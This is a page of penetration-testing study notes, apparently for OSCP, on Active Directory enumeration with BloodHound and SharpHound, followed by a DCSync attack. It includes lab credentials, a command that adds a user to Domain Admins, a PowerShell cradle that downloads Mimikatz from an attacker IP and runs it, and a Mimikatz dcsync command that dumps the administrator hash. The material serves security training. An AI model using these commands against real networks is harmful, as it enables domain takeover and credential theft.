// notes/ Active Directory
🏛️

Post Compromise Enumeration Bloodhound

Bloodhound works the same way that [ldapdomaindump ](/active-directory/post-compromise-enumeration/ldapdomaindump.md)but it also collects data using Kerberos tickets and SMB sessi…

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-enumeration_bloodhound

Bloodhound

Overview

Bloodhound works the same way that ldapdomaindump but it also collects data using Kerberos tickets and SMB sessions.

Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths.

<figure><img src="/files/Ev6bEn7FAHrsg8ma9jNQ" alt=""><figcaption></figcaption></figure>

Domain Enumeration

bash
$sudo neo4j console
bash
$sudo bloodhound
$sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all

Upload the dumped files into the Bloodhound GUI

Custom user to machine session query

code
01MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Sharphound

If you don't have valid AD credentials and only an open shell you can run sharphound.exe to collect the data

{% hint style="danger" %} This is very noisy so it should only be ran if you don't mind the noise {% endhint %}

code
01SharpHound.exe -c All

Methodology

  • Mark all pwned machines
  • Check Reachable High Value Targets
    • Essentially checks if that one machine could compromise the entire domain
  • Check Inbound Control Rights
    • What can account/gorups can control this object
  • Check Outbound Control Rights (First Degree Object Control)
    • What objects can our compromised machine control

DCSync/GetChangesAll

<figure><img src="/files/5RX9b59KdlDDkUNWRhdg" alt=""><figcaption></figcaption></figure>

If you have GetChanges and GetChangesAll privileges you can perform a dcsync attack. This attack abuses dcsync and the way it works with syncing domain controllers together to make sure that they both have the most up to date data. This means that we can extract all of the NTLM hashes by requesting a dcsync with the domain controller.

Add yourself to the Domain service accounts

code
01 net group "Domain Admins" itmanager /add /domain

Amsi bypass then use mimikatz

code
01IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')

Grab domain admin hash

code
01Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'